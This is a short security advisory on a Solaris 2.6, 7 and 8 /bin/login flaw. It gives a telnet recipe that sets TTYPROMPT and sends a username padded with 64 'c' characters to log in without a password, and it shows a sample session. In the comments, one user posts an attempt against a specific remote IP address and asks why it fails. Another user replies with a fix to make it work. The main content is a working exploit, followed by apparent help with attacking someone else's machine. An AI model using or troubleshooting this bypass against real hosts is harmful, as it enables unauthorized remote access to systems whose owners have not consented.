|
|
| |
| Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the environment variable TTYPROMPT and sending of a long username. The vulnerability will allow an attacker to gain elevated privileges on a remote Solaris system. |
| |
Credit:
The information has been provided by Jonathan S.
|
| |
Vulnerable systems:
* Solaris version 2.6, 7, and 8
This vulnerability is very simple to exploit, since it does not require any code to be compiled by an attacker. The vulnerability only requires the attacker to simply define the environment variable TTYPROMPT to a 6-character string, inside telnet. Jonathan believes this overflows an integer inside login, which specifies whether the user has been authenticated (just a guess).
Once connected to the remote host, you must type the username, followed by 64 " c"s, and a literal "\n". You will then be logged in as the user without any password authentication. This should work with any account except root (unless remote root login is allowed).
Example:
coma% telnet
telnet> environ define TTYPROMPT abcdef
telnet> o localhost
SunOS 5.8
bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
Last login: whenever
$ whoami
bin
|
| Subject:
|
Mihai |
Date: |
3 Jul. 2006 |
| From: |
dragomirescu200yahoo.co.uk |
# t
t> environ define TTYPROMPT abcdef
t> o 61.166.33.152
Trying 61.166.33.152...
Connected to 61.166.33.152.
Escape character is '^]'.
SunOS 5.8
bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
Password:
It doesn't work.Please help me |
|
| Subject:
|
Correction |
Date: |
29 Aug. 2007 |
| From: |
Anonyhelper |
| Remove the newline/CR that is in the middle of your line of 64 "e;c"e;s. It should be one unbroken line terminated by the literal \n |
|
|
|
|
